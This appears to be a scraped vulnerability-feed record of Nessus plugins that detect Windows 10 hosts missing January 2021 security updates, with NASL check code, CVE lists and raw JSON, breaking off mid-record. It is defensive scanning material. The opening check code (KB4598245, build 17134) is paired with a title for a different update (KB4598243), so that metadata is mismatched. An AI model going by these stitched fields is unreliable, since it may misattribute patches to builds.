Dependencies: smb_check_rollup.nasl, smb_hotfixes.nasl, ms_bulletin_checks_possible.nasl; requires key SMB/MS_Bulletin_Checks/Possible and ports 139, 445, Host/patch_management_checks
Copyright: (C) Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from the Microsoft Security Updates API. The text itself is copyright (C) Microsoft Corporation. This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.

Plugin detection logic (the check portion of the plugin source, after the description block):

include('smb_func.inc');
include('smb_hotfixes.inc');
include('smb_hotfixes_fcheck.inc');
include('smb_reg_query.inc');

get_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');

bulletin = 'MS21-01';
kbs = make_list(
  '4598245'
);

# Hand the KB list to third-party patch management checks when those are in use.
if (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);

get_kb_item_or_exit('SMB/Registry/Enumerated');
get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);

# Only Windows 10 is in scope for this plugin.
if (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);

share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

# Flag the host only if the January 2021 rollup (KB4598245) is missing on Windows 10 build 17134.
if (
  smb_check_rollup(os:'10',
                   sp:0,
                   os_build:'17134',
                   rollup_date:'01_2021',
                   bulletin:bulletin,
                   rollup_kb_list:[4598245])
)
{
  replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);
  hotfix_security_hole();
  hotfix_check_fversion_end();
  exit(0);
}
else
{
  hotfix_check_fversion_end();
  audit(AUDIT_HOST_NOT, hotfix_get_audit_report());
}

Last seen: 2021-02-13T14:19:49

The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:
 - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. (CVE-2021-1642)
 - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)
 - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680.
(CVE-2021-1651)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)
 - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)
 - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1660)
 - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)
 - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)
 - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)
 - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1673)
 - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)
 - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)
 - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)
 - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)
 - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)
 - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)
 - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)
 - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)
 - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)
 - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)
 - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)
 - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)
 - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)
 - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)
 - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)
 - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)
 - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)
 - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)
 - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)
 - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)
 - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)
 - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)
 - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)
 - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)
 - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. (CVE-2021-1701)
 - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)
 - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)
 - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)
 - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)

Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.

Title: KB4598243: Windows 10 Version 1607 and Windows Server 2016 January 2021 Security Update
Synopsis: The remote Windows host is affected by multiple vulnerabilities.
Type: nessus (bulletin family: scanner); edition 6
Plugin ID: SMB_NT_MS21_JAN_4598243.NASL (script_id 144882, script version 1.8, plugin modification date 2021/02/12)
Reference: https://www.tenable.com/plugins/nessus/144882
Published: 2021-01-12; Modified: 2021-01-12
CPE: cpe:/o:microsoft:windows
CVSS v3: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Cross-references: IAVA 2021-A-0015, IAVA 2021-A-0022, IAVA 2021-A-0023, MSKB 4598243, MSFT MS21-4598243
Copyright: (C) Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from the Microsoft Security Updates API. The text itself is copyright (C) Microsoft Corporation.
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598243/windows-10-update-kb4598243\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b30e3c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598243.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598243'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598243])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-13T14:19:49", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. 
(CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. 
(CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-01-12T00:00:00", "title": "KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-1667", "CVE-2021-1684", "CVE-2021-1682", "CVE-2021-1681", "CVE-2021-1676", "CVE-2021-1679", "CVE-2021-1700", "CVE-2021-1710", "CVE-2021-1666", "CVE-2021-1685", "CVE-2021-1638", "CVE-2021-1687", "CVE-2021-1664", "CVE-2021-1697", "CVE-2021-1702", "CVE-2021-1693", "CVE-2021-1669", "CVE-2021-1673", "CVE-2021-1662", "CVE-2021-1701", "CVE-2021-1688", "CVE-2021-1642", "CVE-2021-1650", "CVE-2021-1699", "CVE-2021-1656", "CVE-2021-1704", "CVE-2021-1655", "CVE-2021-1653", "CVE-2021-1695", "CVE-2021-1648", "CVE-2021-1654", "CVE-2021-1678", "CVE-2021-1670", "CVE-2021-1689", "CVE-2021-1668", "CVE-2021-1694", "CVE-2021-1645", "CVE-2021-1680", "CVE-2021-1661", "CVE-2021-1649", "CVE-2021-1651", "CVE-2021-1708", "CVE-2021-1672", "CVE-2021-1683", "CVE-2021-1659", "CVE-2021-1709", "CVE-2021-1652", "CVE-2021-1637", "CVE-2021-1686", "CVE-2021-1658", "CVE-2021-1671", "CVE-2021-1663", "CVE-2021-1690", "CVE-2021-1660", "CVE-2021-1646", "CVE-2021-1706", "CVE-2021-1696", "CVE-2021-1665", "CVE-2021-1674", "CVE-2021-1657", "CVE-2021-1705"], "modified": "2021-01-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598230.NASL", "href": "https://www.tenable.com/plugins/nessus/144887", "sourceData": "#\n# (C) Tenable 
Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144887);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/12\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n \"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0015\");\n script_xref(name:\"MSKB\", value:\"4598230\");\n script_xref(name:\"MSFT\", value:\"MS21-4598230\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023\");\n\n script_name(english:\"KB4598230: Windows 10 Version 1809 and Windows Server 2019 
January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE 